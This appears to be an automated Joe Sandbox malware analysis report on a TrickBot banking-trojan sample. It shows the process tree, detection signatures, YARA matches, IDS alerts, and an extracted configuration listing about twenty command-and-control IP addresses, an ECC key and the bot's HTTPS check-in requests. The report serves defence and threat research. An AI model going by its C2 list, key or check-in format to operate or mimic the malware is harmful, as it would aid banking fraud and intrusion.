Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
55ryoipjfdr.exe

Overview

General Information

Sample name:55ryoipjfdr.exe
Analysis ID:1592535
MD5:f0b9f50c6a247ac5ca9cc95135b83dcf
SHA1:c1b276883da10fa2bf1c37a3851781e5c702a601
SHA256:068af8016c36fce5cf1e1a4722c1dc0d6e02cb6ed58b61c2ba99a54d294cc274
Tags:exemalwareRansomwareuser-Joker
Infos:

Detection

Trickbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Trickbot e-Banking trojan config
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Trickbot
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Hijacks the control flow in another process
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Yara detected PersistenceViaHiddenTask
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w10x64
  • 55ryoipjfdr.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\55ryoipjfdr.exe" MD5: F0B9F50C6A247AC5CA9CC95135B83DCF)
    • 44qxnhoiecq.exe (PID: 8020 cmdline: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe MD5: F0B9F50C6A247AC5CA9CC95135B83DCF)
      • svchost.exe (PID: 1984 cmdline: svchost.exe -k netsvcs MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • 44qxnhoiecq.exe (PID: 7308 cmdline: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe MD5: F0B9F50C6A247AC5CA9CC95135B83DCF)
    • svchost.exe (PID: 5496 cmdline: svchost.exe -k netsvcs MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
TrickBotA financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.- Q4 2016 - Detected in wildOct 2016 - 1st Report2017 - Trickbot primarily uses Necurs as vehicle for installs.Jan 2018 - Use XMRIG (Monero) minerFeb 2018 - Theft BitcoinMar 2018 - Unfinished ransomware moduleQ3/4 2018 - Trickbot starts being spread through Emotet.Infection Vector1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot2. Phish > Attached MS Office > Macro Enabled > Downloader > Trickbot3. Phish > Attached MS Office > Macro enabled > Trickbot installed
  • TA505
  • UNC1878
  • WIZARD SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot
{"ver": "1000047", "gtag": "mac1", "servs": ["91.83.88.51:449", "193.19.118.207:443", "185.15.245.102:443", "185.15.245.103:443", "199.48.160.60:443", "195.133.48.80:443", "147.135.196.128:443", "194.87.95.120:443", "194.87.99.62:443", "194.87.239.114:443", "94.242.224.218:443", "195.133.147.135:443", "185.158.113.62:443", "194.87.146.180:443", "194.87.99.220:443", "194.87.95.122:443", "194.87.111.6:443", "195.133.197.187:443", "194.87.99.210:443", "169.239.129.42:443", "178.156.202.97:443"], "ecc_key": "RUNTMzAAAADzIIbbIE3wcze1+xiwwK+Au/P78UrAO8YAHyPvHEwGVKOPphl8QVfrC7x/QaFYeXANw6E4HF7ietEp+7ZVQdWOx8c+HvO0Z2PTUPVbX9HAVrg4h9u1RNfhOHk+YysDLsg="}
SourceRuleDescriptionAuthorStrings
00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmpWindows_Trojan_Trickbot_01365e46unknownunknown
  • 0x69d8:$a: 8B 43 28 4C 8B 53 18 4C 8B 5B 10 4C 8B 03 4C 8B 4B 08 89 44 24 38 48 89 4C 24 30 4C
00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmpWindows_Trojan_Trickbot_01365e46unknownunknown
  • 0x69d8:$a: 8B 43 28 4C 8B 53 18 4C 8B 5B 10 4C 8B 03 4C 8B 4B 08 89 44 24 38 48 89 4C 24 30 4C
00000008.00000002.2671214706.00000159F3602000.00000004.00000020.00020000.00000000.sdmpTrickbotdetect TrickBot in memoryJPCERT/CC Incident Response Group
  • 0xaed2:$tagm1: <mcconf><ver>
  • 0x9480:$tagm2: </autorun></mcconf>
  • 0xb4a2:$tagm2: </autorun></mcconf>
00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
    00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Trickbot_1Yara detected TrickbotJoe Security
      Click to see the 7 entries
      SourceRuleDescriptionAuthorStrings
      6.2.svchost.exe.140000000.0.unpackWindows_Trojan_Trickbot_01365e46unknownunknown
      • 0x6dd8:$a: 8B 43 28 4C 8B 53 18 4C 8B 5B 10 4C 8B 03 4C 8B 4B 08 89 44 24 38 48 89 4C 24 30 4C
      8.2.svchost.exe.140000000.0.unpackWindows_Trojan_Trickbot_01365e46unknownunknown
      • 0x6dd8:$a: 8B 43 28 4C 8B 53 18 4C 8B 5B 10 4C 8B 03 4C 8B 4B 08 89 44 24 38 48 89 4C 24 30 4C

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe -k netsvcs, CommandLine: svchost.exe -k netsvcs, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe, ParentImage: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe, ParentProcessId: 8020, ParentProcessName: 44qxnhoiecq.exe, ProcessCommandLine: svchost.exe -k netsvcs, ProcessId: 1984, ProcessName: svchost.exe
      Source: Process startedAuthor: vburov: Data: Command: svchost.exe -k netsvcs, CommandLine: svchost.exe -k netsvcs, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe, ParentImage: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe, ParentProcessId: 8020, ParentProcessName: 44qxnhoiecq.exe, ProcessCommandLine: svchost.exe -k netsvcs, ProcessId: 1984, ProcessName: svchost.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-16T09:10:55.439247+010028383491Malware Command and Control Activity Detected192.168.2.849713194.87.99.210443TCP
      2025-01-16T09:10:56.730422+010028383491Malware Command and Control Activity Detected192.168.2.849714194.87.99.210443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 55ryoipjfdr.exeAvira: detected
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeAvira: detection malicious, Label: HEUR/AGEN.1315497
      Source: 6.2.svchost.exe.140000000.0.unpackMalware Configuration Extractor: Trickbot {"ver": "1000047", "gtag": "mac1", "servs": ["91.83.88.51:449", "193.19.118.207:443", "185.15.245.102:443", "185.15.245.103:443", "199.48.160.60:443", "195.133.48.80:443", "147.135.196.128:443", "194.87.95.120:443", "194.87.99.62:443", "194.87.239.114:443", "94.242.224.218:443", "195.133.147.135:443", "185.158.113.62:443", "194.87.146.180:443", "194.87.99.220:443", "194.87.95.122:443", "194.87.111.6:443", "195.133.197.187:443", "194.87.99.210:443", "169.239.129.42:443", "178.156.202.97:443"], "ecc_key": "RUNTMzAAAADzIIbbIE3wcze1+xiwwK+Au/P78UrAO8YAHyPvHEwGVKOPphl8QVfrC7x/QaFYeXANw6E4HF7ietEp+7ZVQdWOx8c+HvO0Z2PTUPVbX9HAVrg4h9u1RNfhOHk+YysDLsg="}
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeReversingLabs: Detection: 94%
      Source: 55ryoipjfdr.exeVirustotal: Detection: 90%Perma Link
      Source: 55ryoipjfdr.exeReversingLabs: Detection: 94%
      Source: Yara matchFile source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5496, type: MEMORYSTR
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeJoe Sandbox ML: detected
      Source: 55ryoipjfdr.exeJoe Sandbox ML: detected
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_0000000140007340 memcpy,HeapFree,CryptReleaseContext,6_2_0000000140007340
      Source: C:\Windows\System32\svchost.exeCode function: 6_2_0000000140006FB0 HeapFree,CryptReleaseContext,6_2_0000000140006FB0
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_0000000140006FB0 HeapFree,CryptReleaseContext,8_2_0000000140006FB0
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_0000000140007340 memcpy,HeapFree,CryptReleaseContext,8_2_0000000140007340

      Compliance

      barindex
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeUnpacked PE file: 0.2.55ryoipjfdr.exe.400000.0.unpack
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeUnpacked PE file: 3.2.44qxnhoiecq.exe.400000.0.unpack
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeUnpacked PE file: 7.2.44qxnhoiecq.exe.400000.0.unpack
      Source: 55ryoipjfdr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 194.87.99.210:443 -> 192.168.2.8:49713 version: TLS 1.2
      Source: C:\Windows\System32\svchost.exeCode function: 8_2_000000014000D0F0 HeapFree,HeapFree,FindFirstFileW,HeapFree,HeapFree,FindNextFileW,GetLastError,8_2_000000014000D0F0

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2838349 - Severity 1 - ETPRO MALWARE Win32/TrickBot CnC Initial Checkin : 192.168.2.8:49714 -> 194.87.99.210:443
      Source: Network trafficSuricata IDS: 2838349 - Severity 1 - ETPRO MALWARE Win32/TrickBot CnC Initial Checkin : 192.168.2.8:49713 -> 194.87.99.210:443
      Source: Malware configuration extractorIPs: 91.83.88.51:449
      Source: Malware configuration extractorIPs: 193.19.118.207:443
      Source: Malware configuration extractorIPs: 185.15.245.102:443
      Source: Malware configuration extractorIPs: 185.15.245.103:443
      Source: Malware configuration extractorIPs: 199.48.160.60:443
      Source: Malware configuration extractorIPs: 195.133.48.80:443
      Source: Malware configuration extractorIPs: 147.135.196.128:443
      Source: Malware configuration extractorIPs: 194.87.95.120:443
      Source: Malware configuration extractorIPs: 194.87.99.62:443
      Source: Malware configuration extractorIPs: 194.87.239.114:443
      Source: Malware configuration extractorIPs: 94.242.224.218:443
      Source: Malware configuration extractorIPs: 195.133.147.135:443
      Source: Malware configuration extractorIPs: 185.158.113.62:443
      Source: Malware configuration extractorIPs: 194.87.146.180:443
      Source: Malware configuration extractorIPs: 194.87.99.220:443
      Source: Malware configuration extractorIPs: 194.87.95.122:443
      Source: Malware configuration extractorIPs: 194.87.111.6:443
      Source: Malware configuration extractorIPs: 195.133.197.187:443
      Source: Malware configuration extractorIPs: 194.87.99.210:443
      Source: Malware configuration extractorIPs: 169.239.129.42:443
      Source: Malware configuration extractorIPs: 178.156.202.97:443
      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
      Source: Joe Sandbox ViewASN Name: SERVIHOSTING-ASAireNetworksES SERVIHOSTING-ASAireNetworksES
      Source: Joe Sandbox ViewASN Name: MTW-ASRU MTW-ASRU
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: api.ipify.org
      Source: global trafficHTTP traffic detected: GET /mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/ HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36Host: 194.87.99.210
      Source: global trafficHTTP traffic detected: GET /mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/ HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36Host: 194.87.99.210
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36Host: api.ipify.org
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.99.210
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.99.210
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.99.210
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.99.210
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.99.210
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.99.210
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.99.210
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.99.210
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.99.210
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.99.210
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.99.210
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.99.210
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.99.210
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.99.210
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.99.210
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.95.122
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.95.122
      Source: unknownTCP traffic detected without corresponding DNS query: 194.87.95.122
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/ HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36Host: 194.87.99.210
      Source: global trafficHTTP traffic detected: GET /mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/ HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36Host: 194.87.99.210
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36Host: api.ipify.org
      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Thu, 16 Jan 2025 08:10:55 GMTContent-Type: text/htmlContent-Length: 564Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Thu, 16 Jan 2025 08:10:56 GMTContent-Type: text/htmlContent-Length: 564Connection: close
      Source: svchost.exe, 00000008.00000002.2670888110.00000159F2AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://194.87.95.122/
      Source: svchost.exe, 00000008.00000002.2670748747.00000159F2A84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2671363412.00000159F3716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://194.87.95.122/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/
      Source: svchost.exe, 00000008.00000002.2670835827.00000159F2AB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://194.87.95.122/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/H
      Source: svchost.exe, 00000008.00000002.2671346385.00000159F3706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://194.87.95.122:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/
      Source: svchost.exe, 00000008.00000002.2670888110.00000159F2AEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2670888110.00000159F2AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://194.87.99.210/
      Source: svchost.exe, 00000008.00000002.2670748747.00000159F2A84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2670682517.00000159F2A71000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2671363412.00000159F3716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://194.87.99.210/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/
      Source: svchost.exe, 00000008.00000002.2670682517.00000159F2A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://194.87.99.210/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/u
      Source: svchost.exe, 00000008.00000002.2671346385.00000159F3706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://194.87.99.210:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/
      Source: svchost.exe, 00000008.00000002.2670621225.00000159F2A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://194.87.99.210:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/pD
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownHTTPS traffic detected: 194.87.99.210:443 -> 192.168.2.8:49713 version: TLS 1.2

      E-Banking Fraud

      barindex
      Source: svchost.exe, 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <mcconf><ver>1000047</ver><gtag>mac1</gtag><servs><srv>91.83.88.51:449</srv><srv>193.19.118.207:443</srv><srv>185.15.245.102:443</srv><srv>185.15.245.103:443</srv><srv>199.48.160.60:443</srv><srv>195.133.48.80:443</srv><srv>147.135.196.128:443</srv><srv>194.87.95.120:443</srv><srv>194.87.99.62:443</srv><srv>194.87.239.114:443</srv><srv>94.242.224.218:443</srv><srv>195.133.147.135:443</srv><srv>185.158.113.62:443</srv><srv>194.87.146.180:443</srv><srv>194.87.99.220:443</srv><srv>194.87.95.122:443</srv><srv>194.87.111.6:443</srv><srv>195.133.197.187:443</srv><srv>194.87.99.210:443</srv><srv>169.239.129.42:443</srv><srv>178.156.202.97:443</srv></servs><autorun><module name="systeminfo" ctl="GetSystemInfo"/><module name="testnewinj3Dll"/></autorun></mcconf>pe>InteractiveToken</LogonType>
      Source: svchost.exe, 00000008.00000002.2671214706.00000159F3602000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <mcconf><ver>1000047</ver><gtag>mac1</gtag><servs><srv>91.83.88.51:449</srv><srv>193.19.118.207:443</srv><srv>185.15.245.102:443</srv><srv>185.15.245.103:443</srv><srv>199.48.160.60:443</srv><srv>195.133.48.80:443</srv><srv>147.135.196.128:443</srv><srv>194.87.95.120:443</srv><srv>194.87.99.62:443</srv><srv>194.87.239.114:443</srv><srv>94.242.224.218:443</srv><srv>195.133.147.135:443</srv><srv>185.158.113.62:443</srv><srv>194.87.146.180:443</srv><srv>194.87.99.220:443</srv><srv>194.87.95.122:443</srv><srv>194.87.111.6:443</srv><srv>195.133.197.187:443</srv><srv>194.87.99.210:443</srv><srv>169.239.129.42:443</srv><srv>178.156.202.97:443</srv></servs><autorun><module name="systeminfo" ctl="GetSystemInfo"/><module name="testnewinj3Dll"/></autorun></mcconf>
      Source: Yara matchFile source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5496, type: MEMORYSTR

      System Summary

      barindex
      Source: 6.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Trickbot_01365e46 Author: unknown
      Source: 8.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Trickbot_01365e46 Author: unknown
      Source: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Trickbot_01365e46 Author: unknown
      Source: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Trickbot_01365e46 Author: unknown
      Source: 00000008.00000002.2671214706.00000159F3602000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect TrickBot in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect TrickBot in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.2121898954.000000000057E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Trickbot_01365e46 Author: unknown
      Source: 00000007.00000002.2462776816.0000000000768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Trickbot_01365e46 Author: unknown
      Source: C:\Users\user\Desktop\55ryoipjfdr.exeCode function: 0_2_00401A00 GetCurrentProcess,LoadLibraryA,GetProcAddress,NtQueryInformationProcess,0_2_00401A00
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_10001A20 EntryPoint,NtClose,NtClose,3_3_10001A20
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_10001920 NtAllocateVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,3_3_10001920
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_10003220 NtReadVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtClearEvent,NtSignalAndWaitForSingleObject,NtReadVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,3_3_10003220
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_10001830 NtAllocateVirtualMemory,3_3_10001830
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_10002CB0 MultiByteToWideChar,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,LdrLoadDll,NtReadVirtualMemory,NtFreeVirtualMemory,3_3_10002CB0
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_100018C0 NtProtectVirtualMemory,3_3_100018C0
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_100017D0 NtWriteVirtualMemory,3_3_100017D0
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_10001AE0 NtCreateEvent,NtCreateEvent,NtDuplicateObject,NtDuplicateObject,NtSignalAndWaitForSingleObject,NtClose,NtClearEvent,NtWriteVirtualMemory,NtClearEvent,NtClearEvent,NtResumeThread,NtSignalAndWaitForSingleObject,NtClose,NtClose,NtDuplicateObject,NtDuplicateObject,NtFreeVirtualMemory,NtFreeVirtualMemory,3_3_10001AE0
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_10002F60 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,LdrGetProcedureAddress,NtReadVirtualMemory,NtFreeVirtualMemory,3_3_10002F60
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_100015F0 NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,3_3_100015F0
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_10003470 NtReadVirtualMemory,NtWriteVirtualMemory,NtClearEvent,NtSignalAndWaitForSingleObject,NtReadVirtualMemory,3_3_10003470
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_10001FF0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtQueryInformationProcess,NtWriteVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,3_3_10001FF0
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_10001880 NtFreeVirtualMemory,3_3_10001880
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 3_3_10001E70 NtReadVirtualMemory,NtWriteVirtualMemory,NtSignalAndWaitForSingleObject,NtReadVirtualMemory,NtSignalAndWaitForSingleObject,NtClose,NtClose,3_3_10001E70
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_10001A20 EntryPoint,NtClose,NtClose,7_3_10001A20
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_10001920 NtAllocateVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,7_3_10001920
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_10003220 NtReadVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtClearEvent,NtSignalAndWaitForSingleObject,NtReadVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,7_3_10003220
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_10001830 NtAllocateVirtualMemory,7_3_10001830
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_10002CB0 MultiByteToWideChar,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,LdrLoadDll,NtReadVirtualMemory,NtFreeVirtualMemory,7_3_10002CB0
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_100018C0 NtProtectVirtualMemory,7_3_100018C0
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_100017D0 NtWriteVirtualMemory,7_3_100017D0
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_10001AE0 NtCreateEvent,NtCreateEvent,NtDuplicateObject,NtDuplicateObject,NtSignalAndWaitForSingleObject,NtClose,NtClearEvent,NtWriteVirtualMemory,NtClearEvent,NtClearEvent,NtResumeThread,NtSignalAndWaitForSingleObject,NtClose,NtClose,NtDuplicateObject,NtDuplicateObject,NtFreeVirtualMemory,NtFreeVirtualMemory,7_3_10001AE0
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_10002F60 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,LdrGetProcedureAddress,NtReadVirtualMemory,NtFreeVirtualMemory,7_3_10002F60
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_100015F0 NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,7_3_100015F0
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeCode function: 7_3_10003470 NtReadVirtualMemory,NtWriteVirtualMemory,NtClearEvent,NtSignalAndWaitForSingleObject,NtReadVirtualMemory,7_3_10003470
